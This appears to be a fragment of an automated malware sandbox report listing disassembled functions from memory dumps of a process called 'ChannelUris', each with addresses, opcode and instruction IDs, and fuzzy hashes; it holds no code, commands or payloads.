                                                                                                            • Opcode Fuzzy Hash: 0e50d8763efc13a68a68a7f1fd70a53faa845ea24956e0ff87a373d15cb454c6
                                                                                                            • Instruction Fuzzy Hash: E8113AB4A04228CFDB60DFA8C9447DEBBB2FB88315F1080AAC50AA3744DB341D85CF50
                                                                                                            Function 092B7068 Relevance: .0, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cc844e694d24f286c1ac6fbf5d3a4fac57634b5fa6b940dee4b1022e1a17f6af
                                                                                                            • Instruction ID: 03a638eca6b4cabe0d016daeaca01f896a7b33046ce718514ee3ca7db616695f
                                                                                                            • Opcode Fuzzy Hash: cc844e694d24f286c1ac6fbf5d3a4fac57634b5fa6b940dee4b1022e1a17f6af
                                                                                                            • Instruction Fuzzy Hash: 2C01D670929118CBEF04CFA9D8047EAB7FEABCD341F009026D109AB785DB741445CF11
                                                                                                            Function 092B75E3 Relevance: .0, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e516dbafa454c312744ea58e82b3a3dc9a4ddee956c22be6b7bd24fd346de4b8
                                                                                                            • Instruction ID: e49f64b4645f7c18ee6a845325fa95518ae2791d1fdd14818bac392092ba5888
                                                                                                            • Opcode Fuzzy Hash: e516dbafa454c312744ea58e82b3a3dc9a4ddee956c22be6b7bd24fd346de4b8
                                                                                                            • Instruction Fuzzy Hash: 2E111874904129CFDB60DFA8C984BDEBBB2EB89351F1041AAD509A7784EB302E81CF50
                                                                                                            Function 04B1AFF0 Relevance: .0, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 586b27725f00f23af45fb7c58caa6999b730c888e1ec80139118b750d7551afd
                                                                                                            • Instruction ID: 0d684e73bb25c6db4dec0e5a400b1facfdad0f6a0603d7a419448c3af459da51
                                                                                                            • Opcode Fuzzy Hash: 586b27725f00f23af45fb7c58caa6999b730c888e1ec80139118b750d7551afd
                                                                                                            • Instruction Fuzzy Hash: 67018130E00114DFCB04EF79D8596AEBBB2EB84300F50C0B6D516932A4EB34AA46CB81
                                                                                                            Function 04B17F30 Relevance: .0, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7aa30e7e6e4b44ab7f38df8593c24b6b38a701febafa7d0fcf8f548e47a028ec
                                                                                                            • Instruction ID: 6a1f61ffd18bb5322d635cbf05b8f29880671b5f8034f006b361a68c363e34da
                                                                                                            • Opcode Fuzzy Hash: 7aa30e7e6e4b44ab7f38df8593c24b6b38a701febafa7d0fcf8f548e47a028ec
                                                                                                            • Instruction Fuzzy Hash: 2A01C93010060ACFC725DF29C490C9AF7A6FF45318365CA99E95A8B621DB75FD46CF80
                                                                                                            Function 092BDD20 Relevance: .0, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3cdb1927f8b3acc3717a41508d42d7102f57d9ba50b15ed2ad11e8c120458ea5
                                                                                                            • Instruction ID: 5d0e8b50224c6b8e363e2bf4e9ed34eeffa4c9691f035b9179d30ecdb0991140
                                                                                                            • Opcode Fuzzy Hash: 3cdb1927f8b3acc3717a41508d42d7102f57d9ba50b15ed2ad11e8c120458ea5
                                                                                                            • Instruction Fuzzy Hash: 94F0156140E7D54FC3078B7888AA1643FB0AA63000B0E0ADFC1C5CE4B3D59C8A4AD737
                                                                                                            Function 04B1E640 Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 829044fe82c7158adc104da760db9b86e50ba84366399ba76cdfb40a1a19c4a4
                                                                                                            • Instruction ID: 7f9feafdac9e0d103c61218965767249bc82df03a7c2a6ef9fafb78e6623632c
                                                                                                            • Opcode Fuzzy Hash: 829044fe82c7158adc104da760db9b86e50ba84366399ba76cdfb40a1a19c4a4
                                                                                                            • Instruction Fuzzy Hash: 50F0F131B00108CBEB108AA5E804BD777AAF7C93A0F84C472DE0583168D735F800C680
                                                                                                            Function 04B17A8F Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 900b1ac442d25fd620be0265294c4219f51fdf93f32c07f4e0d44f63e39377c5
                                                                                                            • Instruction ID: d22d2159717d070f9225824151c729771c83d077391f2b6f664b9d414aa00ed3
                                                                                                            • Opcode Fuzzy Hash: 900b1ac442d25fd620be0265294c4219f51fdf93f32c07f4e0d44f63e39377c5
                                                                                                            • Instruction Fuzzy Hash: F9F09031700119CFDB00DFA4C4A4ABE7BB6EF89354F640098D002EB2A0DF34AC41CB61
                                                                                                            Function 04B17A23 Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ad6f984bd869911e01657239e298d3bfeb5fcd16f84c28eb37695d9005abc719
                                                                                                            • Instruction ID: 2bf5582f563a0269126367d24dfc24d528438d9f5af28302cb08ba25159bcefb
                                                                                                            • Opcode Fuzzy Hash: ad6f984bd869911e01657239e298d3bfeb5fcd16f84c28eb37695d9005abc719
                                                                                                            • Instruction Fuzzy Hash: A3F09031700119CFDB00DFA4C464AAEBBB6EF99754F640098D002EB2A0DF34AC41CB61
                                                                                                            Function 04B17A59 Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1953b5dadbdd09b2804ce45c75c09f92b3189bbe619bbb9307f176ea0ca90da7
                                                                                                            • Instruction ID: d22d2159717d070f9225824151c729771c83d077391f2b6f664b9d414aa00ed3
                                                                                                            • Opcode Fuzzy Hash: 1953b5dadbdd09b2804ce45c75c09f92b3189bbe619bbb9307f176ea0ca90da7
                                                                                                            • Instruction Fuzzy Hash: F9F09031700119CFDB00DFA4C4A4ABE7BB6EF89354F640098D002EB2A0DF34AC41CB61
                                                                                                            Function 093AD100 Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 575418e2132d1992989f13112bcb7a48d72a77b87202bddf498c7e97ef0fe7cf
                                                                                                            • Instruction ID: 5863b15250f0380fa0a64bc1b686b7e1f403d343795a3c70a0d425613cffc07a
                                                                                                            • Opcode Fuzzy Hash: 575418e2132d1992989f13112bcb7a48d72a77b87202bddf498c7e97ef0fe7cf
                                                                                                            • Instruction Fuzzy Hash: 5EF0B2B4E52219DFCB94EFB9D4456AEBBB1EB48200F008569D815A7680EB781A41CF91
                                                                                                            Function 092B7877 Relevance: .0, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 937b581f7839c9689e9f0151d20f48b09454d49a3c68f29b0abec9efb6d8d1c5
                                                                                                            • Instruction ID: b6a80ed0ef8395c1340902b2cea7021140f813080aca250434d424dce488af38
                                                                                                            • Opcode Fuzzy Hash: 937b581f7839c9689e9f0151d20f48b09454d49a3c68f29b0abec9efb6d8d1c5
                                                                                                            • Instruction Fuzzy Hash: 710116B4901208CFDB50DF68D588B9ABBF2FB88315F1000AAE50997744C7346E858F02
                                                                                                            Function 078A0390 Relevance: .0, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2474163054.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_78a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f39ac5e2f696a30b779baf8e51989fe7a1c5b3e6c5a8cdf5686c3dc57e6bea6d
                                                                                                            • Instruction ID: 0ade451697e4d38323edeb43de285b6cfa952fb86182f9c7c64c57adf114a155
                                                                                                            • Opcode Fuzzy Hash: f39ac5e2f696a30b779baf8e51989fe7a1c5b3e6c5a8cdf5686c3dc57e6bea6d
                                                                                                            • Instruction Fuzzy Hash: 70F0A7921083C19FC31B5734EC316A43F20FF17224B0D00D6D680CBAD3D5689C09C796
                                                                                                            Function 092B73D8 Relevance: .0, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: adedbe1ec23021d41c4d993b658ca7b9eca2d115a2c67f704e8725ba53edea8f
                                                                                                            • Instruction ID: e6ac9e8c1c17b179a5a1f5b9dab9b2c940eeac6d941dfb80550e3e1094235a2e
                                                                                                            • Opcode Fuzzy Hash: adedbe1ec23021d41c4d993b658ca7b9eca2d115a2c67f704e8725ba53edea8f
                                                                                                            • Instruction Fuzzy Hash: 2101FFB49041198FDB60DFA8D95479EBBB2EB58311F1040EBCA09B7744DA346E85CF64
                                                                                                            Function 092BC5C2 Relevance: .0, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5feafedf164288b3cc48f0cd5ddd1a2fc7dfbfdb748272653e8d65aa1a28759c
                                                                                                            • Instruction ID: 58c71007df9964d4c6c09d9932b183d258098e884ab3c428a310961d277d603b
                                                                                                            • Opcode Fuzzy Hash: 5feafedf164288b3cc48f0cd5ddd1a2fc7dfbfdb748272653e8d65aa1a28759c
                                                                                                            • Instruction Fuzzy Hash: 32F082719042599FCB09CF6CD08C7DCBFB2EB80311F1481ADD046AB691D7B45A86CB44
                                                                                                            Function 04B17F98 Relevance: .0, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ff98087bf0dcba84ce3c20ca5b1bedb0ad75b01eb9e6a62b1f54b522efa7e3dd
                                                                                                            • Instruction ID: dd4be7dc1ec67b795064ad39b911d40321a129cb3d4f30509aa48d17630d89d6
                                                                                                            • Opcode Fuzzy Hash: ff98087bf0dcba84ce3c20ca5b1bedb0ad75b01eb9e6a62b1f54b522efa7e3dd
                                                                                                            • Instruction Fuzzy Hash: 00E06832B014C19F8710A72C98058527BC69B462683BD89F2F428CB270FE10FC42C341
                                                                                                            Function 0983A600 Relevance: .0, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 46680eb5fa9e0d2169a5576e7cb9bf15ae665568f12f86ed48fc8238269d238d
                                                                                                            • Instruction ID: dfac1a7388d9f0b00b832226347724bc9d5fd4ff8d4d103c44037c86778e4beb
                                                                                                            • Opcode Fuzzy Hash: 46680eb5fa9e0d2169a5576e7cb9bf15ae665568f12f86ed48fc8238269d238d
                                                                                                            • Instruction Fuzzy Hash: EDF09D74E05209EFCB84EFA8D545AADBBF4FB48200F5085A9D858E7311E7749A41CF81
                                                                                                            Function 093A763F Relevance: .0, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c36e9bd894a8f9e49c37409a0d44dc9664bae68bd684ad09eda20e529be2dc6b
                                                                                                            • Instruction ID: 06ad94ee4e5d31f7b51a7d09eddc665d2bcad6771579036c7cbaa5c088e3c590
                                                                                                            • Opcode Fuzzy Hash: c36e9bd894a8f9e49c37409a0d44dc9664bae68bd684ad09eda20e529be2dc6b
                                                                                                            • Instruction Fuzzy Hash: 8B11337490126ACFDB74CF14D9887E8BBB0FB19301F5085EAD85DA2A50EB705E85EF40
                                                                                                            Function 092BE060 Relevance: .0, Instructions: 27COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4624bb9e8cd13dfe384da3f20930b63352cd351ac39e649d6dbd8ede46bb8a71
                                                                                                            • Instruction ID: e7cb554dc21e5b07aaf55aa2bd31f07e46b5201a6516c14d24b6e68b63d833d7
                                                                                                            • Opcode Fuzzy Hash: 4624bb9e8cd13dfe384da3f20930b63352cd351ac39e649d6dbd8ede46bb8a71
                                                                                                            • Instruction Fuzzy Hash: 7AE06831196344CFDB35AA304C017E43BE46F46391F1184FDD506AF291C5A08805CB60
                                                                                                            Function 092B76EC Relevance: .0, Instructions: 27COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4f5fe4b20dc3101c585eaea6d2d410a8b44005a82697052f2ca350a7fd9f6ef7
                                                                                                            • Instruction ID: acc5e83afc9697535dc61c00eb869cc4dbef0608d82811983bd41297b3235042
                                                                                                            • Opcode Fuzzy Hash: 4f5fe4b20dc3101c585eaea6d2d410a8b44005a82697052f2ca350a7fd9f6ef7
                                                                                                            • Instruction Fuzzy Hash: FE0164B0904128CFCBA0DF68E5887CCBBB2EB54311F1000AAE089A7B14CB742DC0CF05
                                                                                                            Function 092B7900 Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6c2333f9a9d241afd3745cffbcf0bf236f20116b5d70a6ecf404f0cff47fd389
                                                                                                            • Instruction ID: 4cc3aae3af481e1660d2afa7af10d5be89ff50bf601364fd9bdf0c53f6649c6d
                                                                                                            • Opcode Fuzzy Hash: 6c2333f9a9d241afd3745cffbcf0bf236f20116b5d70a6ecf404f0cff47fd389
                                                                                                            • Instruction Fuzzy Hash: A2F03770A05158CFEB50DF98E888B9C7BB2FB85311F1044AAE509ABB48CB746DC4CF21
                                                                                                            Function 092B7189 Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f7bf376caf4e5af260b3722debf58e6a87be3c4dbdc784d42ed8daf0e701474b
                                                                                                            • Instruction ID: 5f4d736fac7dfa1db5a40978e448d5046e91a6a7fa6b77680c3b8592a9a47bd8
                                                                                                            • Opcode Fuzzy Hash: f7bf376caf4e5af260b3722debf58e6a87be3c4dbdc784d42ed8daf0e701474b
                                                                                                            • Instruction Fuzzy Hash: D5F014B0914118DFDB54DF68E584BDCBBB2EB44300F1044AAE609A7B44CB3469848F21
                                                                                                            Function 092B72AA Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2240594fa1fdb0ff42229a23d5db6e0622453d39b904223f331673ceb9ebb1cd
                                                                                                            • Instruction ID: e438e8245305620693aa7eee6d9409896297ce4858681e69f0ab081e741e7619
                                                                                                            • Opcode Fuzzy Hash: 2240594fa1fdb0ff42229a23d5db6e0622453d39b904223f331673ceb9ebb1cd
                                                                                                            • Instruction Fuzzy Hash: E6F014B4905118CFEB90CF58E888BDDBBB2EB49304F0044AAE909A7744CB3469C8CF16
                                                                                                            Function 092BC5D0 Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 117cf70aa74d425902780d413eb057e7ab95e8fe05c45250969dca0a3614cb36
                                                                                                            • Instruction ID: de43f58640c63665e5ea42427cca831bc9c87917aafae727cccfae591cd526a1
                                                                                                            • Opcode Fuzzy Hash: 117cf70aa74d425902780d413eb057e7ab95e8fe05c45250969dca0a3614cb36
                                                                                                            • Instruction Fuzzy Hash: 95F06571A04618AFCB09CF9CD0486DDBFF6EB84361F1480A9D045A7291DB745A86C784
                                                                                                            Function 092B7766 Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 205d56964c2648612f62738c9b4dfcd2d64f2d68bb1085b8643020da1040b60e
                                                                                                            • Instruction ID: 8bb6cdba258eefbc15be5677a3df1d5bcb66c9497789ff7c8b87561f8a6dc3ee
                                                                                                            • Opcode Fuzzy Hash: 205d56964c2648612f62738c9b4dfcd2d64f2d68bb1085b8643020da1040b60e
                                                                                                            • Instruction Fuzzy Hash: ABF03770A05218DFDB90DF68E588B8E7BF2EB86341F00449AE549A7B44CB386D85CF12
                                                                                                            Function 092B9260 Relevance: .0, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0eb26b03adea90a5fe4316483723acc634c03372af91ad3567c8248f9ee45711
                                                                                                            • Instruction ID: 057666ce52cc6a65a428574835af7e9a1448ed28569232fd97454c79f3cd252b
                                                                                                            • Opcode Fuzzy Hash: 0eb26b03adea90a5fe4316483723acc634c03372af91ad3567c8248f9ee45711
                                                                                                            • Instruction Fuzzy Hash: EBF0E578809244EFCB05CFB4D541AACBFB0EF4A304F1482DED84017312C6711952EF51
                                                                                                            Function 092B7D80 Relevance: .0, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a6b93971b41cf9b6c9e87ffd53a4d734323cb6a1f8d8a6c627b1f0d7d8c45b8f
                                                                                                            • Instruction ID: 9c421fba157ee3cc0ec9225283aaebf8310484d3be25e9ad90b018017f484445
                                                                                                            • Opcode Fuzzy Hash: a6b93971b41cf9b6c9e87ffd53a4d734323cb6a1f8d8a6c627b1f0d7d8c45b8f
                                                                                                            • Instruction Fuzzy Hash: 95E03970925119DFCB84DFB8C6846ACBFF4AB89250F2081ACD809D7652E6718A02CF41
                                                                                                            Function 09823803 Relevance: .0, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 21c84099cfe56439392852ee37a39b232d9fe0d0dda3521498fc91d3ffab66b9
                                                                                                            • Instruction ID: 9578b8fbbfd18ca465af685eb031a4f12c7ceffe89b2ee6a8937ab23f9ac1793
                                                                                                            • Opcode Fuzzy Hash: 21c84099cfe56439392852ee37a39b232d9fe0d0dda3521498fc91d3ffab66b9
                                                                                                            • Instruction Fuzzy Hash: 4BF03730909129CFDB64CF68D988B997BF1FF0A315F1000E9D50993641DB396AC58F16
                                                                                                            Function 092B711F Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48d09d8a5d7857e16e6139361bd4444904450f07d674669d36e3a2b2b72e1b22
                                                                                                            • Instruction ID: b3f9d524a78e1b5adc6829d0cd0e015935e4ec19cfbb71baf391c0b187ed101b
                                                                                                            • Opcode Fuzzy Hash: 48d09d8a5d7857e16e6139361bd4444904450f07d674669d36e3a2b2b72e1b22
                                                                                                            • Instruction Fuzzy Hash: 96F0F9B4904218CFDB90DF68D484BDEBBB6BB44300F10449AD509A3744CB745EC5CF52
                                                                                                            Function 092B83B9 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 14d645ee00d7d6c57d4ca54b61780b301506b2ff7481b83e6bf4f68398c7ad74
                                                                                                            • Instruction ID: 8b13a5b19facdde0572e14d27fdae31000fd11f914dea865d67f6d1a14cd4e50
                                                                                                            • Opcode Fuzzy Hash: 14d645ee00d7d6c57d4ca54b61780b301506b2ff7481b83e6bf4f68398c7ad74
                                                                                                            • Instruction Fuzzy Hash: C6F015B9E04209DFC784CFA9D6446ADBBF4EB88305F14C1AE980897341D3359A12CF41
